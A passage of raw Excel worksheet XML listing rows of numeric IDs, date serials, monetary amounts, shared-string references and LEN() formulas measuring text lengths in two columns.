      </c>
      <c r="L349">
        <f>LEN(J349)</f>
        <v>55</v>
      </c>
    </row>
    <row r="350" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A350">
        <v>20546</v>
      </c>
      <c r="B350">
        <v>640</v>
      </c>
      <c r="C350" t="s">
        <v>16293</v>
      </c>
      <c r="D350" t="s">
        <v>16294</v>
      </c>
      <c r="E350">
        <v>16</v>
      </c>
      <c r="F350" t="s">
        <v>9437</v>
      </c>
      <c r="G350" s="1">
        <v>43969</v>
      </c>
      <c r="H350" s="4">
        <v>800000</v>
      </c>
      <c r="I350" t="s">
        <v>9693</v>
      </c>
      <c r="J350" t="s">
        <v>10793</v>
      </c>
      <c r="K350">
        <f>LEN(I350)</f>
        <v>33</v>
      </c>
      <c r="L350">
        <f>LEN(J350)</f>
        <v>55</v>
      </c>
    </row>
    <row r="351" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A351">
        <v>20957</v>
      </c>
      <c r="B351">
        <v>2703</v>
      </c>
      <c r="C351" t="s">
        <v>6064</v>
      </c>
      <c r="D351" t="s">
        <v>11076</v>
      </c>
      <c r="E351">
        <v>26</v>
      </c>
      <c r="F351" t="s">
        <v>11078</v>
      </c>
      <c r="G351" s="1">
        <v>43997</v>
      </c>
      <c r="H351">
        <v>60000</v>
      </c>
      <c r="I351" t="s">
        <v>10323</v>
      </c>
      <c r="J351" t="s">
        <v>11077</v>
      </c>
      <c r="K351">
        <f>LEN(I351)</f>
        <v>33</v>
      </c>
      <c r="L351">
        <f>LEN(J351)</f>
        <v>55</v>
      </c>
    </row>
    <row r="352" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A352">
        <v>20959</v>
      </c>
      <c r="B352">
        <v>2703</v>
      </c>
      <c r="C352" t="s">
        <v>6064</v>
      </c>
      <c r="D352" t="s">
        <v>11076</v>
      </c>
      <c r="E352">
        <v>26</v>
      </c>
      <c r="F352" t="s">
        <v>4686</v>
      </c>
      <c r="G352" s="1">
        <v>43997</v>
      </c>
      <c r="H352">
        <v>12000</v>
      </c>
      <c r="I352" t="s">
        <v>10323</v>
      </c>
      <c r="J352" t="s">
        <v>11077</v>
      </c>
      <c r="K352">
        <f>LEN(I352)</f>
        <v>33</v>
      </c>
      <c r="L352">
        <f>LEN(J352)</f>
        <v>55</v>
      </c>
    </row>
    <row r="353" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A353">
        <v>20960</v>
      </c>
      <c r="B353">
        <v>2703</v>
      </c>
      <c r="C353" t="s">
        <v>6064</v>
      </c>
      <c r="D353" t="s">
        <v>11076</v>
      </c>
      <c r="E353">
        <v>26</v>
      </c>
      <c r="F353" t="s">
        <v>3814</v>
      </c>
      <c r="G353" s="1">
        <v>43997</v>
      </c>
      <c r="H353">
        <v>12000</v>
      </c>
      <c r="I353" t="s">
        <v>10323</v>
      </c>
      <c r="J353" t="s">
        <v>11077</v>
      </c>
      <c r="K353">
        <f>LEN(I353)</f>
        <v>33</v>
      </c>
      <c r="L353">
        <f>LEN(J353)</f>
        <v>55</v>
      </c>
    </row>
    <row r="354" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A354">
        <v>21235</v>
      </c>
      <c r="B354">
        <v>1087</v>
      </c>
      <c r="C354" t="s">
        <v>3074</v>
      </c>
      <c r="D354" t="s">
        <v>11231</v>
      </c>
      <c r="E354">
        <v>13</v>
      </c>
      <c r="F354" t="s">
        <v>3076</v>
      </c>
      <c r="G354" s="1">
        <v>44067</v>
      </c>
      <c r="H354">
        <v>2140000</v>
      </c>
      <c r="I354" t="s">
        <v>9436</v>
      </c>
      <c r="J354" t="s">
        <v>11232</v>
      </c>
      <c r="K354">
        <f>LEN(I354)</f>
        <v>14</v>
      </c>
      <c r="L354">
        <f>LEN(J354)</f>
        <v>55</v>
      </c>
    </row>
    <row r="355" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A355">
        <v>20385</v>
      </c>
      <c r="B355">
        <v>532</v>
      </c>
      <c r="C355" t="s">
        <v>982</v>
      </c>
      <c r="D355" t="s">
        <v>10675</v>
      </c>
      <c r="E355">
        <v>12</v>
      </c>
      <c r="F355" t="s">
        <v>10678</v>
      </c>
      <c r="G355" s="1">
        <v>43949</v>
      </c>
      <c r="H355">
        <v>20000</v>
      </c>
      <c r="J355" t="s">
        <v>10679</v>
      </c>
      <c r="K355">
        <f>LEN(I355)</f>
        <v>0</v>
      </c>
      <c r="L355">
        <f>LEN(J355)</f>
        <v>55</v>
      </c>
    </row>
    <row r="356" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A356">
        <v>20727</v>
      </c>
      <c r="B356">
        <v>881</v>
      </c>
      <c r="C356" t="s">
        <v>3043</v>
      </c>
      <c r="D356" t="s">
        <v>10939</v>
      </c>
      <c r="E356">
        <v>2</v>
      </c>
      <c r="F356" t="s">
        <v>9437</v>
      </c>
      <c r="G356" s="1">
        <v>43994</v>
      </c>
      <c r="H356">
        <v>100000</v>
      </c>
      <c r="J356" t="s">
        <v>10793</v>
      </c>
      <c r="K356">
        <f>LEN(I356)</f>
        <v>0</v>
      </c>
      <c r="L356">
        <f>LEN(J356)</f>
        <v>55</v>
      </c>
    </row>
    <row r="357" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A357">
        <v>20852</v>
      </c>
      <c r="B357">
        <v>1131</v>
      </c>
      <c r="C357" t="s">
        <v>3067</v>
      </c>
      <c r="D357" t="s">
        <v>11039</v>
      </c>
      <c r="E357">
        <v>2</v>
      </c>
      <c r="F357" t="s">
        <v>1746</v>
      </c>
      <c r="G357" s="1">
        <v>44007</v>
      </c>
      <c r="H357">
        <v>312000</v>
      </c>
      <c r="J357" t="s">
        <v>10793</v>
      </c>
      <c r="K357">
        <f>LEN(I357)</f>
        <v>0</v>
      </c>
      <c r="L357">
        <f>LEN(J357)</f>
        <v>55</v>
      </c>
    </row>
    <row r="358" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A358">
        <v>20956</v>
      </c>
      <c r="B358">
        <v>2703</v>
      </c>
      <c r="C358" t="s">
        <v>6064</v>
      </c>
      <c r="D358" t="s">
        <v>11076</v>
      </c>
      <c r="E358">
        <v>26</v>
      </c>
      <c r="F358" t="s">
        <v>9590</v>
      </c>
      <c r="G358" s="1">
        <v>43997</v>
      </c>
      <c r="H358">
        <v>120000</v>
      </c>
      <c r="J358" t="s">
        <v>11077</v>
      </c>
      <c r="K358">
        <f>LEN(I358)</f>
        <v>0</v>
      </c>
      <c r="L358">
        <f>LEN(J358)</f>
        <v>55</v>
      </c>
    </row>
    <row r="359" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A359">
        <v>20958</v>
      </c>
      <c r="B359">
        <v>2703</v>
      </c>
      <c r="C359" t="s">
        <v>6064</v>
      </c>
      <c r="D359" t="s">
        <v>11076</v>
      </c>
      <c r="E359">
        <v>26</v>
      </c>
      <c r="F359" t="s">
        <v>9527</v>
      </c>
      <c r="G359" s="1">
        <v>43997</v>
      </c>
      <c r="H359">
        <v>12000</v>
      </c>
      <c r="J359" t="s">
        <v>11077</v>
      </c>
      <c r="K359">
        <f>LEN(I359)</f>
        <v>0</v>
      </c>
      <c r="L359">
        <f>LEN(J359)</f>
        <v>55</v>
      </c>
    </row>
    <row r="360" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A360">
        <v>21245</v>
      </c>
      <c r="B360">
        <v>4775</v>
      </c>
      <c r="C360" t="s">
        <v>7147</v>
      </c>
      <c r="D360" t="s">
        <v>11239</v>
      </c>
      <c r="E360">
        <v>16</v>
      </c>
      <c r="F360" t="s">
        <v>1746</v>
      </c>
      <c r="G360" s="1">
        <v>44041</v>
      </c>
      <c r="H360">
        <v>150000</v>
      </c>
      <c r="J360" t="s">
        <v>11245</v>
      </c>
      <c r="K360">
        <f>LEN(I360)</f>
        <v>0</v>
      </c>
      <c r="L360">
        <f>LEN(J360)</f>
        <v>55</v>
      </c>
    </row>
    <row r="361" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A361">
        <v>21333</v>
      </c>
      <c r="B361">
        <v>4798</v>
      </c>
      <c r="C361" t="s">
        <v>7183</v>
      </c>
      <c r="D361" t="s">
        <v>11310</v>
      </c>
      <c r="E361">
        <v>11</v>
      </c>
      <c r="F361" t="s">
        <v>9497</v>
      </c>
      <c r="G361" s="1">
        <v>44034</v>
      </c>
      <c r="H361">
        <v>500000</v>
      </c>
      <c r="J361" t="s">
        <v>10793</v>
      </c>
      <c r="K361">
        <f>LEN(I361)</f>
        <v>0</v>
      </c>
      <c r="L361">
        <f>LEN(J361)</f>
        <v>55</v>
      </c>
    </row>
    <row r="362" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A362">
        <v>21360</v>
      </c>
      <c r="B362">
        <v>427</v>
      </c>
      <c r="C362" t="s">
        <v>1619</v>
      </c>
      <c r="D362" t="s">
        <v>11325</v>
      </c>
      <c r="E362">
        <v>12</v>
      </c>
      <c r="F362" t="s">
        <v>9497</v>
      </c>
      <c r="G362" s="1">
        <v>44116</v>
      </c>
      <c r="H362">
        <v>20000</v>
      </c>
      <c r="J362" t="s">
        <v>10793</v>
      </c>
      <c r="K362">
        <f>LEN(I362)</f>
        <v>0</v>
      </c>
      <c r="L362">
        <f>LEN(J362)</f>
        <v>55</v>
      </c>
    </row>
    <row r="363" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A363">
        <v>21361</v>
      </c>
      <c r="B363">
        <v>427</v>
      </c>
      <c r="C363" t="s">
        <v>1619</v>
      </c>
      <c r="D363" t="s">
        <v>11325</v>
      </c>
      <c r="E363">
        <v>12</v>
      </c>
      <c r="F363" t="s">
        <v>3499</v>
      </c>
      <c r="G363" s="1">
        <v>44116</v>
      </c>
      <c r="H363">
        <v>20000</v>
      </c>
      <c r="J363" t="s">
        <v>10793</v>
      </c>
      <c r="K363">
        <f>LEN(I363)</f>
        <v>0</v>
      </c>
      <c r="L363">
        <f>LEN(J363)</f>
        <v>55</v>
      </c>
    </row>
    <row r="364" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A364">
        <v>21363</v>
      </c>
      <c r="B364">
        <v>427</v>
      </c>
      <c r="C364" t="s">
        <v>1619</v>
      </c>
      <c r="D364" t="s">
        <v>11325</v>
      </c>
      <c r="E364">
        <v>12</v>
      </c>
      <c r="F364" t="s">
        <v>2236</v>
      </c>
      <c r="G364" s="1">
        <v>44116</v>
      </c>
      <c r="H364">
        <v>10000</v>
      </c>
      <c r="J364" t="s">
        <v>10793</v>
      </c>
      <c r="K364">
        <f>LEN(I364)</f>
        <v>0</v>
      </c>
      <c r="L364">
        <f>LEN(J364)</f>
        <v>55</v>
      </c>
    </row>
    <row r="365" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A365">
        <v>21364</v>
      </c>
      <c r="B365">
        <v>427</v>
      </c>
      <c r="C365" t="s">
        <v>1619</v>
      </c>
      <c r="D365" t="s">
        <v>11325</v>
      </c>
      <c r="E365">
        <v>12</v>
      </c>
      <c r="F365" t="s">
        <v>3763</v>
      </c>
      <c r="G365" s="1">
        <v>44267</v>
      </c>
      <c r="H365">
        <v>1000</v>
      </c>
      <c r="J365" t="s">
        <v>10793</v>
      </c>
      <c r="K365">
        <f>LEN(I365)</f>
        <v>0</v>
      </c>
      <c r="L365">
        <f>LEN(J365)</f>
        <v>55</v>
      </c>
    </row>
    <row r="366" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A366">
        <v>21246</v>
      </c>
      <c r="B366">
        <v>4775</v>
      </c>
      <c r="C366" t="s">
        <v>7147</v>
      </c>
      <c r="D366" t="s">
        <v>11239</v>
      </c>
      <c r="E366">
        <v>16</v>
      </c>
      <c r="F366" t="s">
        <v>11246</v>
      </c>
      <c r="G366" s="1">
        <v>44041</v>
      </c>
      <c r="H366">
        <v>600000</v>
      </c>
      <c r="I366" t="s">
        <v>11247</v>
      </c>
      <c r="J366" t="s">
        <v>11248</v>
      </c>
      <c r="K366">
        <f>LEN(I366)</f>
        <v>58</v>
      </c>
      <c r="L366">
        <f>LEN(J366)</f>
        <v>54</v>
      </c>
    </row>
    <row r="367" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A367">
        <v>21379</v>
      </c>
      <c r="B367">
        <v>1946</v>
      </c>
      <c r="C367" t="s">
        <v>6123</v>
      </c>
      <c r="D367" t="s">
        <v>11346</v>
      </c>
      <c r="E367">
        <v>19</v>
      </c>
      <c r="F367" t="s">
        <v>3763</v>
      </c>
      <c r="G367" s="1">
        <v>44090</v>
      </c>
      <c r="H367">
        <v>200000</v>
      </c>
      <c r="I367" t="s">
        <v>9550</v>
      </c>
      <c r="J367" t="s">
        <v>11347</v>
      </c>
      <c r="K367">
        <f>LEN(I367)</f>
        <v>18</v>
      </c>
      <c r="L367">
        <f>LEN(J367)</f>
        <v>54</v>
      </c>
    </row>
    <row r="368" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A368">
        <v>20668</v>
      </c>
      <c r="B368">
        <v>2759</v>
      </c>
      <c r="C368" t="s">
        <v>327</v>
      </c>
      <c r="D368" t="s">
        <v>10730</v>
      </c>
      <c r="E368">
        <v>29</v>
      </c>
      <c r="F368" t="s">
        <v>2236</v>
      </c>
      <c r="G368" s="1">
        <v>43930</v>
      </c>
      <c r="H368">
        <v>684000</v>
      </c>
      <c r="J368" t="s">
        <v>10876</v>
      </c>
      <c r="K368">
        <f>LEN(I368)</f>
        <v>0</v>
      </c>
      <c r="L368">
        <f>LEN(J368)</f>
        <v>54</v>
      </c>
    </row>
    <row r="369" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A369">
        <v>21325</v>
      </c>
      <c r="B369">
        <v>4759</v>
      </c>
      <c r="C369" t="s">
        <v>7012</v>
      </c>
      <c r="D369" t="s">
        <v>11305</v>
      </c>
      <c r="E369">
        <v>16</v>
      </c>
      <c r="F369" t="s">
        <v>11308</v>
      </c>
      <c r="G369" s="1">
        <v>44048</v>
      </c>
      <c r="H369">
        <v>1172000</v>
      </c>
      <c r="J369" t="s">
        <v>11309</v>
      </c>
      <c r="K369">
        <f>LEN(I369)</f>
        <v>0</v>
      </c>
      <c r="L369">
        <f>LEN(J369)</f>
        <v>54</v>
      </c>
    </row>
    <row r="370" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A370">
        <v>20550</v>
      </c>
      <c r="B370">
        <v>1973</v>
      </c>
      <c r="C370" t="s">
        <v>5826</v>
      </c>
      <c r="D370" t="s">
        <v>10796</v>
      </c>
      <c r="E370">
        <v>16</v>
      </c>
      <c r="F370" t="s">
        <v>7241</v>
      </c>
      <c r="G370" s="1">
        <v>44067</v>
      </c>
      <c r="H370">
        <v>800000</v>
      </c>
      <c r="I370" t="s">
        <v>10799</v>
      </c>
      <c r="J370" t="s">
        <v>10800</v>
      </c>
      <c r="K370">
        <f>LEN(I370)</f>
        <v>88</v>
      </c>
      <c r="L370">
        <f>LEN(J370)</f>
        <v>53</v>
      </c>
    </row>
    <row r="371" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A371">
        <v>20720</v>
      </c>
      <c r="B371">
        <v>2332</v>
      </c>
      <c r="C371" t="s">
        <v>5974</v>
      </c>
      <c r="D371" t="s">
        <v>9594</v>
      </c>
      <c r="E371">
        <v>13</v>
      </c>
      <c r="F371" t="s">
        <v>10926</v>
      </c>
      <c r="G371" s="1">
        <v>44000</v>
      </c>
      <c r="H371">
        <v>50000</v>
      </c>
      <c r="I371" t="s">
        <v>10927</v>
      </c>
      <c r="J371" t="s">
        <v>10928</v>
      </c>
      <c r="K371">
        <f>LEN(I371)</f>
        <v>47</v>
      </c>
      <c r="L371">
        <f>LEN(J371)</f>
        <v>53</v>
      </c>
    </row>
    <row r="372" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A372">
        <v>20899</v>
      </c>
      <c r="B372">
        <v>2024</v>
      </c>
      <c r="C372" t="s">
        <v>16277</v>
      </c>
      <c r="D372" t="s">
        <v>16278</v>
      </c>
      <c r="E372">
        <v>16</v>
      </c>
      <c r="F372" t="s">
        <v>9453</v>
      </c>
      <c r="G372" s="1">
        <v>43962</v>
      </c>
      <c r="H372" s="4">
        <v>100000</v>
      </c>
      <c r="I372" t="s">
        <v>11049</v>
      </c>
      <c r="J372" t="s">
        <v>10160</v>
      </c>
      <c r="K372">
        <f>LEN(I372)</f>
        <v>34</v>
      </c>
      <c r="L372">
        <f>LEN(J372)</f>
        <v>53</v>
      </c>
    </row>
    <row r="373" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A373">
        <v>19657</v>
      </c>
      <c r="B373">
        <v>2126</v>
      </c>
      <c r="C373" t="s">
        <v>4772</v>
      </c>
      <c r="D373" t="s">
        <v>10156</v>
      </c>
      <c r="E373">
        <v>1</v>
      </c>
      <c r="F373" t="s">
        <v>4686</v>
      </c>
      <c r="G373" s="1">
        <v>43868</v>
      </c>
      <c r="H373">
        <v>6000</v>
      </c>
      <c r="J373" t="s">
        <v>10160</v>
      </c>
      <c r="K373">
        <f>LEN(I373)</f>
        <v>0</v>
      </c>
      <c r="L373">
        <f>LEN(J373)</f>
        <v>53</v>
      </c>
    </row>
    <row r="374" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A374">
        <v>19659</v>
      </c>
      <c r="B374">
        <v>2126</v>
      </c>
      <c r="C374" t="s">
        <v>4772</v>
      </c>
      <c r="D374" t="s">
        <v>10156</v>
      </c>
      <c r="E374">
        <v>1</v>
      </c>
      <c r="F374" t="s">
        <v>6917</v>
      </c>
      <c r="G374" s="1">
        <v>43868</v>
      </c>
      <c r="H374">
        <v>6000</v>
      </c>
      <c r="J374" t="s">
        <v>10160</v>
      </c>
      <c r="K374">
        <f>LEN(I374)</f>
        <v>0</v>
      </c>
      <c r="L374">
        <f>LEN(J374)</f>
        <v>53</v>
      </c>
    </row>
    <row r="375" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A375">
        <v>20997</v>
      </c>
      <c r="B375">
        <v>1381</v>
      </c>
      <c r="C375" t="s">
        <v>2504</v>
      </c>
      <c r="D375" t="s">
        <v>9549</v>
      </c>
      <c r="E375">
        <v>11</v>
      </c>
      <c r="F375" t="s">
        <v>11092</v>
      </c>
      <c r="G375" s="1">
        <v>44014</v>
      </c>
      <c r="H375">
        <v>500</v>
      </c>
      <c r="J375" t="s">
        <v>11093</v>
      </c>
      <c r="K375">
        <f>LEN(I375)</f>
        <v>0</v>
      </c>
      <c r="L375">
        <f>LEN(J375)</f>
        <v>53</v>
      </c>
    </row>
    <row r="376" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A376">
        <v>21004</v>
      </c>
      <c r="B376">
        <v>1381</v>
      </c>
      <c r="C376" t="s">
        <v>2504</v>
      </c>
      <c r="D376" t="s">
        <v>9549</v>
      </c>
      <c r="E376">
        <v>11</v>
      </c>
      <c r="F376" t="s">
        <v>11097</v>
      </c>
      <c r="G376" s="1">
        <v>44014</v>
      </c>
      <c r="H376">
        <v>500</v>
      </c>
      <c r="J376" t="s">
        <v>11093</v>
      </c>
      <c r="K376">
        <f>LEN(I376)</f>
        <v>0</v>
      </c>
      <c r="L376">
        <f>LEN(J376)</f>
        <v>53</v>
      </c>
    </row>
    <row r="377" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A377">
        <v>21007</v>
      </c>
      <c r="B377">
        <v>1381</v>
      </c>
      <c r="C377" t="s">
        <v>2504</v>
      </c>
      <c r="D377" t="s">
        <v>9549</v>
      </c>
      <c r="E377">
        <v>11</v>
      </c>
      <c r="F377" t="s">
        <v>3814</v>
      </c>
      <c r="G377" s="1">
        <v>44014</v>
      </c>
      <c r="H377">
        <v>500</v>
      </c>
      <c r="J377" t="s">
        <v>11093</v>
      </c>
      <c r="K377">
        <f>LEN(I377)</f>
        <v>0</v>
      </c>
      <c r="L377">
        <f>LEN(J377)</f>
        <v>53</v>
      </c>
    </row>
    <row r="378" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A378">
        <v>21025</v>
      </c>
      <c r="B378">
        <v>1381</v>
      </c>
      <c r="C378" t="s">
        <v>2504</v>
      </c>
      <c r="D378" t="s">
        <v>9549</v>
      </c>
      <c r="E378">
        <v>11</v>
      </c>
      <c r="F378" t="s">
        <v>10426</v>
      </c>
      <c r="G378" s="1">
        <v>44014</v>
      </c>
      <c r="H378">
        <v>500</v>
      </c>
      <c r="J378" t="s">
        <v>11103</v>
      </c>
      <c r="K378">
        <f>LEN(I378)</f>
        <v>0</v>
      </c>
      <c r="L378">
        <f>LEN(J378)</f>
        <v>53</v>
      </c>
    </row>
    <row r="379" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A379">
        <v>20522</v>
      </c>
      <c r="B379">
        <v>2777</v>
      </c>
      <c r="C379" t="s">
        <v>789</v>
      </c>
      <c r="D379" t="s">
        <v>10768</v>
      </c>
      <c r="E379">
        <v>12</v>
      </c>
      <c r="F379" t="s">
        <v>10770</v>
      </c>
      <c r="G379" s="1">
        <v>43952</v>
      </c>
      <c r="H379">
        <v>250000</v>
      </c>
      <c r="I379" t="s">
        <v>10771</v>
      </c>
      <c r="J379" t="s">
        <v>10037</v>
      </c>
      <c r="K379">
        <f>LEN(I379)</f>
        <v>38</v>
      </c>
      <c r="L379">
        <f>LEN(J379)</f>
        <v>52</v>
      </c>
    </row>
    <row r="380" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A380">
        <v>20521</v>
      </c>
      <c r="B380">
        <v>2777</v>
      </c>
      <c r="C380" t="s">
        <v>789</v>
      </c>
      <c r="D380" t="s">
        <v>10768</v>
      </c>
      <c r="E380">
        <v>12</v>
      </c>
      <c r="F380" t="s">
        <v>10769</v>
      </c>
      <c r="G380" s="1">
        <v>43952</v>
      </c>
      <c r="H380">
        <v>100000</v>
      </c>
      <c r="I380" t="s">
        <v>9550</v>
      </c>
      <c r="J380" t="s">
        <v>10037</v>
      </c>
      <c r="K380">
        <f>LEN(I380)</f>
        <v>18</v>
      </c>
      <c r="L380">
        <f>LEN(J380)</f>
        <v>52</v>
      </c>
    </row>
    <row r="381" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A381">
        <v>20567</v>
      </c>
      <c r="B381">
        <v>2769</v>
      </c>
      <c r="C381" t="s">
        <v>6962</v>
      </c>
      <c r="D381" t="s">
        <v>10816</v>
      </c>
      <c r="E381">
        <v>25</v>
      </c>
      <c r="F381" t="s">
        <v>9437</v>
      </c>
      <c r="G381" s="1">
        <v>43959</v>
      </c>
      <c r="H381">
        <v>0</v>
      </c>
      <c r="I381" t="s">
        <v>9536</v>
      </c>
      <c r="J381" t="s">
        <v>10817</v>
      </c>
      <c r="K381">
        <f>LEN(I381)</f>
        <v>13</v>
      </c>
      <c r="L381">
        <f>LEN(J381)</f>
        <v>52</v>
      </c>
    </row>
    <row r="382" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A382">
        <v>19431</v>
      </c>
      <c r="B382">
        <v>592</v>
      </c>
      <c r="C382" t="s">
        <v>354</v>
      </c>
      <c r="D382" t="s">
        <v>10032</v>
      </c>
      <c r="E382">
        <v>12</v>
      </c>
      <c r="F382" t="s">
        <v>10036</v>
      </c>
      <c r="G382" s="1">
        <v>43900</v>
      </c>
      <c r="H382">
        <v>1200</v>
      </c>
      <c r="J382" t="s">
        <v>10037</v>
      </c>
      <c r="K382">
        <f>LEN(I382)</f>
        <v>0</v>
      </c>
      <c r="L382">
        <f>LEN(J382)</f>
        <v>52</v>
      </c>
    </row>
    <row r="383" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A383">
        <v>21284</v>
      </c>
      <c r="B383">
        <v>444</v>
      </c>
      <c r="C383" t="s">
        <v>1595</v>
      </c>
      <c r="D383" t="s">
        <v>11264</v>
      </c>
      <c r="E383">
        <v>16</v>
      </c>
      <c r="F383" t="s">
        <v>3499</v>
      </c>
      <c r="G383" s="1">
        <v>44155</v>
      </c>
      <c r="H383">
        <v>10000</v>
      </c>
      <c r="J383" t="s">
        <v>10817</v>
      </c>
      <c r="K383">
        <f>LEN(I383)</f>
        <v>0</v>
      </c>
      <c r="L383">
        <f>LEN(J383)</f>
        <v>52</v>
      </c>
    </row>
    <row r="384" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A384">
        <v>19818</v>
      </c>
      <c r="B384">
        <v>1326</v>
      </c>
      <c r="C384" t="s">
        <v>2788</v>
      </c>
      <c r="D384" t="s">
        <v>10261</v>
      </c>
      <c r="E384">
        <v>22</v>
      </c>
      <c r="F384" t="s">
        <v>2790</v>
      </c>
      <c r="G384" s="1">
        <v>43896</v>
      </c>
      <c r="H384">
        <v>540000</v>
      </c>
      <c r="I384" t="s">
        <v>10262</v>
      </c>
      <c r="J384" t="s">
        <v>10263</v>
      </c>
      <c r="K384">
        <f>LEN(I384)</f>
        <v>41</v>
      </c>
      <c r="L384">
        <f>LEN(J384)</f>
        <v>51</v>
      </c>
    </row>
    <row r="385" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A385">
        <v>19307</v>
      </c>
      <c r="B385">
        <v>2353</v>
      </c>
      <c r="C385" t="s">
        <v>4876</v>
      </c>
      <c r="D385" t="s">
        <v>9906</v>
      </c>
      <c r="E385">
        <v>34</v>
      </c>
      <c r="F385" t="s">
        <v>1746</v>
      </c>
      <c r="G385" s="1">
        <v>43859</v>
      </c>
      <c r="H385">
        <v>250000</v>
      </c>
      <c r="I385" t="s">
        <v>9693</v>
      </c>
      <c r="J385" t="s">
        <v>9914</v>
      </c>
      <c r="K385">
        <f>LEN(I385)</f>
        <v>33</v>
      </c>
      <c r="L385">
        <f>LEN(J385)</f>
        <v>51</v>
      </c>
    </row>
    <row r="386" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A386">
        <v>19335</v>
      </c>
      <c r="B386">
        <v>2341</v>
      </c>
      <c r="C386" t="s">
        <v>4697</v>
      </c>
      <c r="D386" t="s">
        <v>9930</v>
      </c>
      <c r="E386">
        <v>26</v>
      </c>
      <c r="F386" t="s">
        <v>364</v>
      </c>
      <c r="G386" s="1">
        <v>43852</v>
      </c>
      <c r="H386">
        <v>6000000</v>
      </c>
      <c r="J386" t="s">
        <v>9931</v>
      </c>
      <c r="K386">
        <f>LEN(I386)</f>
        <v>0</v>
      </c>
      <c r="L386">
        <f>LEN(J386)</f>
        <v>51</v>
      </c>
    </row>
    <row r="387" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A387">
        <v>19557</v>
      </c>
      <c r="B387">
        <v>2331</v>
      </c>
      <c r="C387" t="s">
        <v>5205</v>
      </c>
      <c r="D387" t="s">
        <v>10099</v>
      </c>
      <c r="E387">
        <v>26</v>
      </c>
      <c r="F387" t="s">
        <v>10101</v>
      </c>
      <c r="G387" s="1">
        <v>43909</v>
      </c>
      <c r="H387">
        <v>50000</v>
      </c>
      <c r="J387" t="s">
        <v>10102</v>
      </c>
      <c r="K387">
        <f>LEN(I387)</f>
        <v>0</v>
      </c>
      <c r="L387">
        <f>LEN(J387)</f>
        <v>51</v>
      </c>
    </row>
    <row r="388" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A388">
        <v>19850</v>
      </c>
      <c r="B388">
        <v>373</v>
      </c>
      <c r="C388" t="s">
        <v>535</v>
      </c>
      <c r="D388" t="s">
        <v>10281</v>
      </c>
      <c r="E388">
        <v>16</v>
      </c>
      <c r="F388" t="s">
        <v>9441</v>
      </c>
      <c r="G388" s="1">
        <v>43935</v>
      </c>
      <c r="H388">
        <v>2400000</v>
      </c>
      <c r="J388" t="s">
        <v>10283</v>
      </c>
      <c r="K388">
        <f>LEN(I388)</f>
        <v>0</v>
      </c>
      <c r="L388">
        <f>LEN(J388)</f>
        <v>51</v>
      </c>
    </row>
    <row r="389" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A389">
        <v>20764</v>
      </c>
      <c r="B389">
        <v>1582</v>
      </c>
      <c r="C389" t="s">
        <v>3036</v>
      </c>
      <c r="D389" t="s">
        <v>10961</v>
      </c>
      <c r="E389">
        <v>16</v>
      </c>
      <c r="F389" t="s">
        <v>364</v>
      </c>
      <c r="G389" s="1">
        <v>43964</v>
      </c>
      <c r="H389">
        <v>4000000</v>
      </c>
      <c r="J389" t="s">
        <v>10962</v>
      </c>
      <c r="K389">
        <f>LEN(I389)</f>
        <v>0</v>
      </c>
      <c r="L389">
        <f>LEN(J389)</f>
        <v>51</v>
      </c>
    </row>
    <row r="390" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A390">
        <v>19629</v>
      </c>
      <c r="B390">
        <v>686</v>
      </c>
      <c r="C390" t="s">
        <v>16299</v>
      </c>
      <c r="D390" t="s">
        <v>16300</v>
      </c>
      <c r="E390">
        <v>1</v>
      </c>
      <c r="F390" t="s">
        <v>10140</v>
      </c>
      <c r="G390" s="1">
        <v>43871</v>
      </c>
      <c r="H390" s="4">
        <v>100000</v>
      </c>
      <c r="I390" t="s">
        <v>10141</v>
      </c>
      <c r="J390" t="s">
        <v>10138</v>
      </c>
      <c r="K390">
        <f>LEN(I390)</f>
        <v>107</v>
      </c>
      <c r="L390">
        <f>LEN(J390)</f>
        <v>50</v>
      </c>
    </row>
    <row r="391" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A391">
        <v>19628</v>
      </c>
      <c r="B391">
        <v>686</v>
      </c>
      <c r="C391" t="s">
        <v>16299</v>
      </c>
      <c r="D391" t="s">
        <v>16300</v>
      </c>
      <c r="E391">
        <v>1</v>
      </c>
      <c r="F391" t="s">
        <v>3814</v>
      </c>
      <c r="G391" s="1">
        <v>43871</v>
      </c>
      <c r="H391" s="4">
        <v>100000</v>
      </c>
      <c r="I391" t="s">
        <v>10139</v>
      </c>
      <c r="J391" t="s">
        <v>10138</v>
      </c>
      <c r="K391">
        <f>LEN(I391)</f>
